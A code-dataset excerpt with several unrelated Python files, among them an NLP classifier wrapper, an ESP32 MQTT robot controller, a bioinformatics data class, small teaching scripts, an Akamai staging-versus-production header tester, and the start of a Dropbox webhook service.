src.data_reader.data_reader import make_dataframe\n\n\nclass DIETClassifierWrapper:\n    \"\"\"Wrapper for DIETClassifier.\"\"\"\n    def __init__(self, config: Union[Dict[str, Dict[str, Any]], str]):\n        \"\"\"\n        Create wrapper with configuration.\n\n        :param config: config in dictionary format or path to 
config file (.yml)\n        \"\"\"\n        self.config_file_path = None\n        if isinstance(config, str):\n            try:\n                f = open(config, \"r\")\n            except Exception as ex:\n                raise RuntimeError(f\"Cannot read config file from {config}: {ex}\")\n            self.config_file_path = config\n            config = yaml.safe_load(f)\n            f.close()\n\n        self.config = config\n        self.util_config = config.get(\"util\", None)\n\n        model_config_dict = config.get(\"model\", None)\n        if not model_config_dict:\n            raise ValueError(f\"Config file should have 'model' attribute\")\n\n        self.dataset_config = model_config_dict\n\n        if model_config_dict.get(\"device\") is not None:\n            self.device = torch.device(model_config_dict[\"device\"]) if torch.cuda.is_available() else torch.device(\"cpu\")\n        else:\n            self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n        model_config_attributes = [\"model\", \"intents\", \"entities\"]\n        # model_config_dict = {k: v for k, v in model_config_dict.items() if k in model_config_attributes}\n\n        self.intents = model_config_dict[\"intents\"]\n        self.entities = [\"O\"] + model_config_dict[\"entities\"]\n\n        self.model_config = DIETClassifierConfig(**{k: v for k, v in model_config_dict.items() if k in model_config_attributes})\n\n        training_config_dict = config.get(\"training\", None)\n        if not training_config_dict:\n            raise ValueError(f\"Config file should have 'training' attribute\")\n\n        self.training_config = training_config_dict\n        self.tokenizer = BertTokenizerFast.from_pretrained(model_config_dict[\"tokenizer\"])\n        self.model = DIETClassifier(config=self.model_config)\n\n        self.model.to(self.device)\n\n        self.softmax = torch.nn.Softmax(dim=-1)\n\n        self.synonym_dict = {} if not model_config_dict.get(\"synonym\") else model_config_dict[\"synonym\"]\n\n    def tokenize(self, sentences) -> Tuple[Dict[str, Any], List[List[Tuple[int, int]]]]:\n        \"\"\"\n        Tokenize sentences using the tokenizer.\n        :param sentences: list of sentences\n        :return: tuple(tokenized sentences, offset_mapping for sentences)\n        \"\"\"\n        inputs = self.tokenizer(sentences, return_tensors=\"pt\", return_attention_mask=True, return_token_type_ids=True,\n                                return_offsets_mapping=True,\n                                padding=True, truncation=True)\n\n        offset_mapping = inputs[\"offset_mapping\"]\n        inputs = {k: v.to(self.device) for k, v in inputs.items() if k != \"offset_mapping\"}\n\n        return inputs, offset_mapping\n\n    def convert_intent_logits(self, intent_logits: torch.tensor) -> List[Dict[str, float]]:\n        \"\"\"\n        Convert logits from the model to a predicted intent.\n\n        :param intent_logits: output from model\n        :return: list of dictionaries with the predicted intent and the full intent ranking\n        \"\"\"\n        softmax_intents = self.softmax(intent_logits)\n\n        predicted_intents = []\n\n        for sentence in softmax_intents:\n            sentence = sentence[0]\n\n            sorted_sentence = sentence.clone()\n            sorted_sentence, _ = torch.sort(sorted_sentence)\n\n            if sorted_sentence[-1] >= self.util_config[\"intent_threshold\"] and (\n                    sorted_sentence[-1] - sorted_sentence[-2]) >= self.util_config[\"ambiguous_threshold\"]:\n                max_probability = torch.argmax(sentence)\n            else:\n                max_probability = -1\n\n            predicted_intents.append({\n                \"intent\": None if max_probability == -1 else self.intents[max_probability],\n                \"intent_ranking\": {\n                    intent_name: probability.item() for intent_name, probability in zip(self.intents, sentence)\n                }\n            })\n\n        return predicted_intents\n\n    def convert_entities_logits(self, entities_logits: torch.tensor, offset_mapping: torch.tensor) -> List[List[Dict[str, Any]]]:\n        \"\"\"\n        Convert logits to predicted entities\n\n        :param entities_logits: entities logits from model\n        :param offset_mapping: offset mapping for sentences\n        :return: list of predicted entities\n        \"\"\"\n        softmax_entities = 
self.softmax(entities_logits)\n\n predicted_entities = []\n\n for sentence, offset in zip(softmax_entities, offset_mapping):\n predicted_entities.append([])\n latest_entity = None\n for word, token_offset in zip(sentence, offset[1:]):\n max_probability = torch.argmax(word)\n if word[max_probability] >= self.util_config[\"entities_threshold\"] and max_probability != 0:\n if self.entities[max_probability] != latest_entity:\n latest_entity = self.entities[max_probability]\n predicted_entities[-1].append({\n \"entity_name\": self.entities[max_probability],\n \"start\": token_offset[0].item(),\n \"end\": token_offset[1].item()\n })\n else:\n predicted_entities[-1][-1][\"end\"] = token_offset[1].item()\n else:\n latest_entity = None\n\n return predicted_entities\n\n def predict(self, sentences: List[str]) -> List[Dict[str, Any]]:\n \"\"\"\n Predict intent and entities from sentences.\n\n :param sentences: list of sentences\n :return: list of prediction\n \"\"\"\n inputs, offset_mapping = self.tokenize(sentences=sentences)\n outputs = self.model(**inputs)\n logits = outputs[\"logits\"]\n predicted_intents = self.convert_intent_logits(intent_logits=logits[1])\n predicted_entities = self.convert_entities_logits(entities_logits=logits[0], offset_mapping=offset_mapping)\n predicted_outputs = []\n for sentence, intent_sentence, entities_sentence in zip(sentences, predicted_intents, predicted_entities):\n predicted_outputs.append({})\n predicted_outputs[-1].update(intent_sentence)\n predicted_outputs[-1].update({\"entities\": entities_sentence})\n for entity in predicted_outputs[-1][\"entities\"]:\n entity[\"text\"] = sentence[entity[\"start\"]: entity[\"end\"]]\n\n if self.synonym_dict.get(entity[\"text\"], None):\n entity[\"original_text\"] = entity[\"text\"]\n entity[\"text\"] = self.synonym_dict[entity[\"text\"]]\n\n predicted_outputs[-1][\"text\"] = sentence\n\n return predicted_outputs\n\n def save_pretrained(self, directory: str):\n \"\"\"\n Save model and tokenizer to directory\n\n :param directory: path to save folder\n :return: None\n \"\"\"\n self.model.save_pretrained(directory)\n self.tokenizer.save_pretrained(directory)\n\n config_file_path = \"config.yml\" if not self.config_file_path else self.config_file_path\n\n try:\n f = open(config_file_path, \"w\")\n yaml.dump(self.config, f, sort_keys=False)\n f.close()\n except Exception as ex:\n raise RuntimeError(f\"Cannot save config to {config_file_path} by error: {ex}\")\n\n def train_model(self, save_folder: str = \"latest_model\"):\n \"\"\"\n Create trainer, train and save best model to save_folder\n :param save_folder: path to save folder\n :return: None\n \"\"\"\n dataset_folder = self.dataset_config[\"dataset_folder\"]\n if not path.exists(dataset_folder):\n raise ValueError(f\"Folder {dataset_folder} is not exists\")\n\n files_list = [path.join(dataset_folder, f) for f in listdir(dataset_folder) if path.isfile(path.join(dataset_folder, f)) and f.endswith(\".yml\")]\n\n df, _, _, synonym_dict = make_dataframe(files=files_list)\n\n self.synonym_dict.update(synonym_dict)\n self.config[\"model\"][\"synonym\"] = self.synonym_dict\n\n dataset = DIETClassifierDataset(dataframe=df, tokenizer=self.tokenizer, entities=self.entities[1:], intents=self.intents)\n\n trainer = DIETTrainer(model=self.model, dataset=dataset,\n train_range=self.training_config[\"train_range\"],\n num_train_epochs=self.training_config[\"num_train_epochs\"],\n per_device_train_batch_size=self.training_config[\"per_device_train_batch_size\"],\n 
per_device_eval_batch_size=self.training_config[\"per_device_eval_batch_size\"],\n warmup_steps=self.training_config[\"warmup_steps\"],\n weight_decay=self.training_config[\"weight_decay\"],\n logging_dir=self.training_config[\"logging_dir\"],\n early_stopping_patience=self.training_config[\"early_stopping_patience\"],\n early_stopping_threshold=self.training_config[\"early_stopping_threshold\"],\n output_dir=self.training_config[\"output_dir\"])\n\n trainer.train()\n\n self.save_pretrained(directory=save_folder)\n\n\nif __name__ == \"__main__\":\n config_file = \"src/config.yml\"\n\n wrapper = DIETClassifierWrapper(config=config_file)\n\n print(wrapper.predict([\"I work on office hours\"]))\n\n wrapper.train_model()\n\n print(wrapper.predict([\"What is the average working hours\"]))\n\n\n","sub_path":"src/models/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":9971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"200661604","text":"from machine import Pin\nfrom board import *\nfrom drv8833 import DRV8833\nfrom mqttclient import MQTTClient\nimport time, gc\nfrom math import fabs\n\n# robot controlled by joystick\n\n# remote led control\nled = Pin(LED, mode=Pin.OUT)\n\n# mqtt\nBROKER = \"iot.eclipse.org\"\nBROKER = \"mac15.home\"\nBROKER = \"habiandev.local\"\nBROKER = \"dev.home\"\nmqtt = MQTTClient(BROKER)\nprint(\"connected to broker at\", BROKER)\n\nrun = True\nx = y = 0\nbrake = False\n\ndef set_speed():\n global motors, x, y, brake\n if brake:\n motors.brake(0)\n motors.brake(1)\n return\n sp0 = x + y\n sp1 = x - y\n if fabs(sp0) < 0.1: sp0 = 0\n if fabs(sp1) < 0.1: sp1 = 0\n print(\"setspeed x={:6.3f}, y={:6.3f} --> sp0={:6.3f} sp1={:6.3f}\".format(x, y, sp0, sp1))\n motors.speed(0, sp0)\n motors.speed(1, sp1)\n\ndef mqtt_callback(topic, msg):\n msg = msg.decode(\"utf-8\")\n global led, run, motors, x, y, brake\n if topic == b'stop':\n brake = msg == 'True'\n led(brake)\n if brake:\n print(\"apply emergency brake\")\n motors.brake(0)\n motors.brake(1)\n else:\n print(\"release brake\")\n elif topic == b'x':\n x = float(msg)\n set_speed()\n elif topic == b'y':\n y = float(msg)\n set_speed()\n elif topic == b'repl2':\n run = False\n\n\nmqtt.set_callback(mqtt_callback)\nmqtt.subscribe(\"repl\")\nmqtt.subscribe(\"x\")\nmqtt.subscribe(\"y\")\nmqtt.subscribe(\"stop\")\n\n\n# motor controller\n\nfreq = 100\nstop = False\nmotors = None\n\ndef speed_to_freq(speed):\n f = 2500*fabs(speed)-450\n return min(max(20, f), 500)\n\n\nwith DRV8833(freq, A20, A21, A19, A18) as m:\n m.pwm_freq(0, speed_to_freq)\n m.pwm_freq(1, speed_to_freq)\n motors = m\n while run:\n if gc.mem_free() < 20000:\n gc.collect()\n # check for messages\n mqtt.check_msg()\n time.sleep_ms(50)\n\nmqtt.disconnect()\n\nprint(\"returning control to repl\")\n","sub_path":"boards/esp32/libraries/projects/joystick/J_robot_joystick.py","file_name":"J_robot_joystick.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"601595591","text":"import copy\nimport json\nimport psimi\nfrom lxml import etree as ET \n\nclass Participant(psimi.Base): \n \"\"\"Biomolecule form as used in the experiment. Corresponds to\n ... 
element of the PSI-MI XML record.\n    \"\"\"\n    def __init__( self, prt=None, root=None ):\n        super(Participant, self ).__init__( raw = prt, root = root)\n\n    def __repr__(self):\n        rep=[]\n        rep.append(\" Participant:\")\n        rep.append(\"   Label:\\t\" + str(self.ilabel))\n        rep.append(\"   Name:\\t\" + str(self.iname))\n        rep.append(\"   Species:\\t\" + str(self.ispecies))\n        rep.append(\"   IPXref:\\t\" + str(self.ipxref))\n        if self.isxref and len(self.isxref) > 0:\n            rep.append(\"   ISXref:\" )\n            for sx in self.isxref:\n                rep.append(\"\\t\\t\" + str(sx))\n\n        rep.append(\"   PXref:\\t\" + str(self.pxref))\n        if self.sxref and len(self.sxref) > 0:\n            rep.append(\"   SXref:\" )\n            for sx in self.sxref:\n                rep.append(\"\\t\\t\" + str(sx))\n        if self.ehost:\n            rep.append(\"   Exp Host:\\t\" + str(self.ehost))\n        else:\n            rep.append(\"   Exp Host:\\t\" + str(self.ispecies))\n\n        rep.append(\"   Exp Prep:\\t\" + str(self.eprep))\n        rep.append(\"   Exp Role:\\t\" + str(self.erole))\n        rep.append(\"   Bio Role:\\t\" + str(self.brole))\n        rep.append(\"   Id Method:\\t\" + str(self.pidmth))\n\n        if self.frolst and len( self.frolst ) > 0:\n            rep.append(\"   Features:\")\n            for f in self.frolst:\n                rep.append( \"    \" + str(f) )\n        rep.append(\"\")\n        return '\\n'.join(rep)\n\n    @property\n    def interactor(self):\n        \"\"\"psimi.Interactor object representing the reference version of\n        the biomolecule.\n        \"\"\"\n        return psimi.Interactor(self._raw['i10r'], self._root)\n\n    @property\n    def prt(self):\n        \"\"\"Raw participant record data structure.\n        \"\"\"\n        return self._raw\n\n    @property\n    def iname( self ):\n        \"\"\"Interactor name\n        \"\"\"\n        if 'name' in self._raw['i10r'].keys():\n            return self._raw['i10r']['name']\n        return None\n\n    @property\n    def ilabel( self ):\n        \"\"\"Interactor short(er) label\n        \"\"\"\n        if 'label' in self._raw['i10r']:\n            return self._raw['i10r']['label']\n        else:\n            return self._raw['i10r']['pxref'][0]['ac']\n\n    @property\n    def ispecies( self ):\n        \"\"\"Interactor species. Native species the biomolecule is made in\"\"\"\n        if 'species' in self._raw['i10r'].keys():\n            if self._raw['i10r']['species'] is not None:\n                return self._raw['i10r']['species']\n        return None\n\n    @property\n    def ehost( self ):\n        \"\"\"Experimental host list. The list of the organism(s) that the\n        biomolecule used in the experiment was produced in.\n        \"\"\"\n        if 'ehost' in self._raw.keys():\n            return list(self._raw['ehost'])\n        return None\n\n    @property\n    def erole( self ):\n        \"\"\"Experimental role list. The list of experimental roles\n        (e.g. bait, prey) of the participant in the experiment.\n        \"\"\"\n        if 'erole' in self._raw.keys():\n            return self._raw['erole']\n\n        self._raw['erole'] = None\n        return None\n\n    @property\n    def brole( self ):\n        \"\"\"Biological role. The biological role of the participant\n        (e.g. enzyme, enzyme target), as used in the experiment.\n        \"\"\"\n        if 'brole' in self._raw.keys():\n            return self._raw['brole']\n        else:\n            self._raw['brole'] = None\n            return None\n\n    @property\n    def eprep( self ):\n        \"\"\"Experimental preparation (list). Terms describing experimental\n        preparation of the participant.\n        \"\"\"\n        if 'eprep' in self._raw.keys():\n            return self._raw['eprep']\n        else:\n            self._raw['eprep'] = None\n            return None\n\n    @property\n    def pidmth( self ):\n        \"\"\"Participant identification method (list). The methods used to\n        identify the molecule as participating in the interactions.\n        \"\"\"\n        if 'pidmth' in self._raw.keys():\n            return self._raw['pidmth']\n        else:\n            self._raw['pidmth'] = None\n            return None\n\n    @property\n    def ipxref( self ):\n        \"\"\"Primary cross-reference of the interactor.\n        \"\"\"\n        return self.interactor.pxref\n\n    @property\n    def isxref( self ):\n        \"\"\"Secondary cross-references of the interactor.\n        \"\"\"\n        return self.interactor.sxref\n\n    @property\n    def attrib( self):\n        \"\"\"Attribute list.\n        \"\"\"\n        if 'attrib' in self._raw.keys():\n            return self._raw['attrib']\n        else:\n            return None\n\n    @property\n    def feature( self ):\n        \"\"\"A list of raw records describing features relevant for the\n        experiment that demonstrated the described interaction.\n        \"\"\"\n        if 'feature' in self._raw.keys():\n            return self._raw['feature']\n        else:\n            return None\n\n    @property\n    def frolst( self ):\n        \"\"\"A list of psimi.Feature objects describing features relevant\n        for the experiment that demonstrated the described interaction.\n        \"\"\"\n        if 'feature' in self._raw.keys() and len( self._raw['feature']) > 0:\n            frolst = []\n            for fr in self._raw['feature']:\n                frolst.append(psimi.Feature(fr, self._root ) )\n            return frolst\n        return None\n","sub_path":"pylib/pymex/psimi/participant.py","file_name":"participant.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"593774084","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nfrom sklearn import neighbors, datasets, cluster, svm\niris = datasets.load_iris()\nknn = neighbors.KNeighborsClassifier()\nknn.fit(iris.data, iris.target)\nresult0 = knn.predict([[5.0, 3.0, 5.0, 2.0]])\npred0 = knn.predict(iris.data)\n\n\nkmeans = cluster.KMeans(n_clusters=3).fit(iris.data)\npred1 = kmeans.predict(iris.data)\nresult1 = kmeans.predict([[5.0, 3.0, 5.0, 2.0]])\n\nsvc = svm.LinearSVC()\nsvc.fit(iris.data, iris.target)\nresult2 = svc.predict([[5.0, 3.0, 5.0, 2.0]])\npred2 = svc.predict(iris.data)\n\nprint(\"{}:{}:{}\".format(result0, result1, result2))\n\nfor label in pred0:\n    print(label, end=\" \")\n\nprint('\\n')\nfor label in pred1:\n    print(label, end=\" \")\n\nprint('\\n')\nfor label in pred2:\n    print(label, end=\" \")\n\nprint('\\n')\nfor label in iris.target:\n    print(label, end=' ')\n","sub_path":"chapter4/iris.py","file_name":"iris.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"175583765","text":"#example of tuples in python\nt = 'example1', 'example2', 'example3'\nprint(t)\n\nmultiTuple = 'simple', t, ('multi', 'tuple')\nprint(multiTuple)\nprint(multiTuple[0])\n\n#empty tuple\nempty = ()\n\n#one-element tuple -> necessary to add a comma at the end\noneElementTuple = 'one',\n\n#unpacking tuples\nunpacker = ('unpack', 'simple', 'this', 'tuple')\na, b, c, d = unpacker\n\nprint(a + b + c + d)\n#tuples are immutable, you can't change the current value of a tuple\n","sub_path":"basics/tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"426994520","text":"import numpy as np\n\ndef algo(a, b, c, d):\n\t'''\n\tTridiagonal algorithm\n\t|\tb1 \tc1 \t0 \t0\t|\td1\t|\n\t|\ta1 \tb2 \tc2 \t0\t|\td2\t|\n\t|\t0\ta2\tb3\tc3\t|\td3\t|\n\t|\t0\t0\ta3\tb4\t|\td4\t|\n\t->\n\t|\tx1\tx2\tx3\tx4\t|\n\t'''\n\n\tnf = len(d) # number of equations\n\tac, bc, cc, dc 
= tuple(map(np.array, (a, b, c, d))) # copy arrays\n\tfor it in range(1, nf):\n\t\tmc = ac[it - 1] / bc[it - 1]\n\t\tbc[it] = bc[it] - mc * cc[it - 1] \n\t\tdc[it] = dc[it] - mc * dc[it - 1]\n\n\txc = bc\n\txc[-1] = dc[-1]/bc[-1]\n\n\tfor il in range(nf-2, -1, -1):\n\t\txc[il] = (dc[il]-cc[il]*xc[il+1])/bc[il]\n\n\treturn xc\n\ndef matrix_to_3list(arr):\n\t'''\n\tConvert matrix to 3 vectors:\n\tArr -> \n\t|\tb1 \tc1 \t0 \t0\t|\n\t|\ta1 \tb2 \tc2 \t0\t|\n\t|\t0\ta2\tb3\tc3\t|\n\t|\t0\t0\ta3\tb4\t|\n\t'''\n\tm, n = np.shape(arr)\n\t# if np.linalg.det(arr) == 0:\n\t# \treturn -1\n\tif m != n:\n\t\tprint('m != n')\n\t\treturn -1\n\tfor i in range(n):\n\t\tfor j in range(n):\n\t\t\tif (i == j) or (i - 1 == j) or (i + 1 == j):\n\t\t\t\tif arr[i][j] == 0:\n\t\t\t\t\tprint('arr[i][j] == 0')\n\t\t\t\t\treturn -1\n\t\t\telse:\n\t\t\t\tif arr[i][j] != 0:\n\t\t\t\t\tprint('arr[i][j] != 0')\n\t\t\t\t\treturn -1\n\ta, b, c = [], [], []\n\tfor i in range(n):\n\t\tb.append(arr[i][i])\n\t\tif i != 0:\n\t\t\ta.append(arr[i][i - 1])\n\t\t\tc.append(arr[i - 1][i])\n\treturn tuple(map(np.array, (a, b, c)))","sub_path":"algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"77946472","text":"print(\"value separated by enter keyword\")\r\nn=int(input(\"Enter the range of array :\"))\r\n\r\narr=[float(input()) for i in range(0,n)]\r\n\r\nmax=arr[0]\r\nfor i in range(0,n):\r\n\tif max < arr[i]:\r\n\t\tmax=arr[i]\r\n\telse:\r\n\t\tcontinue\r\nprint(\"The maximum no is {}\".format(max))","sub_path":"maximum in array.py","file_name":"maximum in array.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"129477768","text":"import requests\nimport urllib3\nimport csv\nimport re\nimport json\nimport htmlp, rname\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nAKAM_PRAGMA='akamai-x-get-request-id, akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable,akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-feo-trace'\nAKAM_CHDR=['x-cache-key', 'x-true-cache-key', 'x-check-cacheable', 'x-akamai-staging']\nDEFAULT_CHDR=['location', 'content-encoding', 'etag', 'server', 'content-length', 'last-modified', 'content-type', 'cache-control', 'edge-control']\n\n\nclass Actor(object):\n def __init__(self, connhost=None):\n self.connhost=connhost\n self.req=None\n\n def get(self, url, params=None, **kargs):\n if 'headers' not in kargs:\n kargs['headers'] = dict()\n kargs['headers'].update({'Pragma': AKAM_PRAGMA})\n \n # spoofing\n if self.connhost is not None:\n # parse host \n match = re.search('(http|https):\\/\\/([^\\/]+)(\\/.*$|$)', url)\n assert match is not None\n host=match.group(2)\n url=url.replace(host, self.connhost)\n \n if 'headers' not in kargs:\n kargs['headers'] = dict()\n kargs['headers'].update({'Host': host})\n \n if 'verify' not in kargs:\n kargs['verify']=False\n\n \n r=requests.get(url, params, **kargs)\n self.req=r\n #self.dump(r)\n\n def dump(self, req=None):\n #pre=r.prepare()\n if req is None:\n assert self.req is not None\n req=self.req\n\n print('{} {}'.format(req.request.method, req.request.url))\n for k,v in req.request.headers.items():\n print(k,v)\n else:\n print()\n\n print(req.status_code)\n for k,v in 
req.headers.items():\n print(k,v)\n\n \nclass Tester(object):\n '''\n feddata: [url] [tobe] [tobe code] [result] [result code] [judge]\n '''\n def __init__(self, prodhost, stghost):\n self.a=Actor()\n self.prod=Actor(prodhost)\n self.stg=Actor(stghost)\n \n\n def redirect(self, testcasefile):\n '''\n testcasefile should contain list of redirect testcase like:\n [from url] [to url] [status code]\n http://abc.com/a.html?abc=123 https://foo.com/erro.html 301\n http://abc.com/a.html https://bar.com/ 302\n ....\n '''\n rows=[]\n with open(testcasefile) as f:\n for line in f:\n rows.append( re.split('[ \\t]+', line) )\n \n for r in rows:\n self.a.get(r[0], allow_redirects=False)\n ret='NG'\n if self.a.req.status_code == int(r[2]):\n assert 'Location' in self.a.req.headers or 'location' in self.a.req.headers\n if self.a.req.headers['location'] == r[1]:\n ret='Passed'\n elif r[1].endswith(self.a.req.headers['location']):\n ret='Contains'\n else:\n print('>>>> {} vs {}'.format(self.a.req.headers['location'], r[1]))\n \n akamemo=''\n if 'x-akamai-staging' in self.a.req.headers:\n akamemo = 'x-akamai-staging:{}'.format( self.a.req.headers['x-akamai-staging'] )\n # target(src), ret_code, ret_judge, memo\n print('{}, {}, {}, server:{} {}'.format(r[0], self.a.req.status_code, ret, self.a.req.headers['Server'], akamemo))\n\n def __redirect(self, url, query, prod_actor, stg_actor):\n # scan prod\n prod_location='-'\n prod_actor.get(url, query, allow_redirects=False)\n if 'location' in prod_actor.req.headers:\n prod_location = prod_actor.req.headers['location']\n\n # scan stg\n stg_location='-'\n stg_actor.get(url, query, allow_redirects=False)\n if 'location' in stg_actor.req.headers:\n stg_location = stg_actor.req.headers['location']\n\n # check \n ret='NG'\n if prod_actor.req.status_code == stg_actor.req.status_code:\n if prod_location == stg_location:\n ret='Passed'\n elif prod_location.endswith(stg_location):\n ret='Passed (sub match)'\n elif stg_location.endswith(prod_location):\n ret='Passed (sub match)'\n\n # print: target, prod, prod_code, stg, stg_code, result\n print('{}, {}, {}, {}, {}, {}'.format(prod_actor.req.request.url, prod_location, prod_actor.req.status_code, stg_location, stg_actor.req.status_code, ret))\n\n def redirect2(self, testcasefile, query=''):\n rows=[]\n with open(testcasefile) as f:\n for line in f:\n rows.append( re.split('[ \\t]+', line) )\n #rows.append(line.rstrip())\n\n for r in rows:\n #self.__redirect(r, self.prod, self.stg)\n #self.__redirect(r+query, self.prod, self.stg)\n self.__redirect(r[0], {r[3].rstrip(): 'users/omura/fund_touraku'}, self.prod, self.stg)\n\n def diff(self, urllist):\n diffcnt=0\n cnt=0\n for url in urllist:\n print(url)\n ret = self._diff_header(url, self.prod, self.stg)\n for d in ret['diff']:\n print(' >>', d, ret[d])\n else:\n print()\n if len(ret['diff']) != 0:\n diffcnt+=1\n cnt+=1\n else:\n print('{} diffs out of {} tests'.format(diffcnt, cnt))\n return ret\n\n def diff_fromfile(self, testcasefile):\n urllist=[]\n with open(testcasefile) as f:\n for l in f:\n url = l.strip()\n if url == '':\n continue\n \n urllist.append(url)\n self.diff(urllist)\n\n def _diff_header(self, url, prod_actor, stg_actor, hdrs=[]):\n '''\n hdrs: list: [ 'etag', 'cache-control']\n result:\n ret['date']['prod'] = 'abc123'\n ret['date']['match'] = true\n ret['diff'] = ['etag', 'server']\n {\n 'status' : { 'prod': '200' , 'stg': '200', 'match': 'true'],\n 'diff' : ['etag', 'server']\n }\n '''\n \n prod_actor.get(url, allow_redirects=False)\n stg_actor.get(url, 
allow_redirects=False)\n #for k,v in stg_actor.req.headers.items():\n # print( '{}: {}'.format(k, v) )\n diff=[]\n ret={}\n ret['status_code'] = { 'prod': prod_actor.req.status_code, 'stg': stg_actor.req.status_code}\n if prod_actor.req.status_code == stg_actor.req.status_code:\n ret['status_code']['match'] = True\n else:\n ret['status_code']['match'] = False\n diff.append('status_code')\n\n chdr = AKAM_CHDR + DEFAULT_CHDR\n for h in hdrs:\n if h.lower() not in chdr:\n chdr.append(h.lower())\n\n for h in chdr:\n cret={}\n if h in prod_actor.req.headers:\n cret['prod']=prod_actor.req.headers[h]\n else:\n cret['prod']=''\n if h in stg_actor.req.headers:\n cret['stg']=stg_actor.req.headers[h]\n else:\n cret['stg']=''\n \n if cret['prod'] == cret['stg']:\n cret['match'] = True\n else:\n cret['match'] = False\n if h != 'x-akamai-staging':\n diff.append(h)\n \n ret[h] = cret\n ret['diff'] = diff\n\n #print(json.dumps(ret, indent=2))\n #stg_actor.dump()\n return ret\n \nif __name__ == '__main__':\n #a=Actor('www.omura.co.jp.edgekey-staging.net')\n #a.get('https://www.omura.co.jp/recruit/', headers={'cookie':'adb'})\n #a.dump()\n #t=Tester('www.omura.co.jp.edgekey-staging.net')\n #t=Tester('www.omura.co.jp.edgekey.net', 'www.omura.co.jp.edgekey-staging.net')\n #t.redirect2('redirectlist_q.txt', '?abc=123')\n\n \n #t=Tester('www.wakodo.co.jp', 'www.wakodo.co.jp.edgekey-staging.net')\n #t._diff_header('http://www.wakodo.co.jp/?id=123', t.prod, t.stg)\n #t._diff_header('http://www-stg.nomura.co.jp/market/movie/customer/summer2.html', t.prod, t.stg)\n #t.diff_fromfile('testcase.txt')\n \n hostname='www.jins.com'\n proto='https://'\n rn=rname.rname()\n prod, stg = rn.get_akname('www.jins.com')\n\n hp=htmlp.Hp()\n hp.parsePage(proto+hostname)\n\n t=Tester(prod, stg)\n t.diff(hp.links)\n\n","sub_path":"actor.py","file_name":"actor.py","file_ext":"py","file_size_in_byte":7626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"181147731","text":"from MongoReader import *\nfrom LineToKeywords import *\nfrom CounterMovingWindow import *\n\nimport curses\nfrom functools import partial\n\ndef UseTop(screen,date,top):\n\tscreen.clear()\n\tscreen.addstr(0, 0, \"--{0}--\".format(date))\n\tline = \"--\" + str(date) + \"--\\n\"\n\tfor pos,(word,count) in enumerate(top):\n\t\tscreen.addstr(pos+1, 0, word)\n\t\tscreen.addstr(pos+1, 15, \"{0}\".format(count))\n\tscreen.refresh()\n\ndef main(screen):\n\twith MongoReader(\"twitter\",\"textPosts\") as reader,LineToKeywords() as lk:\n\t\twindow = CounterMovingWindow(partial(UseTop,screen))\n\t\tfor post in reader:\n\t\t\twords = lk.getKeywords(post['text'])\n\t\t\ttime = post['created_at']\n\t\t\twindow.receivePost(words,time)\n\t\t\nif __name__ == '__main__':\n\ttry:\n\t\tcurses.wrapper(main)\n\texcept KeyboardInterrupt:\n\t\tsys.exit()\n","sub_path":"twitterKeywords/code/Process_Chart.py","file_name":"Process_Chart.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"551185206","text":"from hashlib import sha256\nimport sys\nimport hmac\nimport json\nimport os\nimport logging\nimport boto3\nfrom botocore.exceptions import ClientError\n\nfrom dropbox import Dropbox\nfrom dropbox.files import DeletedMetadata, FolderMetadata, WriteMode\nfrom flask import abort, Flask, send_from_directory, Response, request\nimport redis\n\nfrom environs import Env\n\nenv = Env()\n# Read .env into os.environ\nenv.read_env()\n\nPORT = 
env.int('PORT')\n\nAWS_ACCESS_KEY = env('AWS_ACCESS_KEY')\nif AWS_ACCESS_KEY is None:\n\tsys.exit('AWS_ACCESS_KEY is not specified')\n\nAWS_SECRET_KEY = env('AWS_SECRET_KEY')\nif AWS_SECRET_KEY is None:\n\tsys.exit('AWS_SECRET_KEY is not specified')\n\n\nAWS_REGION = env('AWS_REGION')\nif AWS_REGION is None:\n\tsys.exit('AWS_REGION is not specified')\n\nSQS_QUEUE_URL = env('SQS_QUEUE_URL')\nif SQS_QUEUE_URL is None:\n\tsys.exit('SQS_QUEUE_URL is not specified')\n\nsqs = boto3.client(\n 'sqs',\n aws_access_key_id=AWS_ACCESS_KEY,\n aws_secret_access_key=AWS_SECRET_KEY,\n\tregion_name=AWS_REGION\n)\n\n\nredis_url = env('REDISTOGO_URL')\nif redis_url is None:\n\tsys.exit('REDISTOGO_URL is not specified')\n\nredis_client = redis.from_url(redis_url)\n\n# App key and secret from the App console (dropbox.com/developers/apps)\nDROPBOX_TOKEN = env('DROPBOX_TOKEN')\nif DROPBOX_TOKEN is None:\n\tsys.exit('DROPBOX_TOKEN is not specified')\n\nDROPBOX_APP_SECRET = env('DROPBOX_APP_SECRET')\nif DROPBOX_APP_SECRET is None:\n\tsys.exit('DROPBOX_APP_SECRET is not specified')\n\nDROPBOX_MONITOR_FOLDOER=env('DROPBOX_MONITOR_FOLDOER')\nif DROPBOX_MONITOR_FOLDOER is 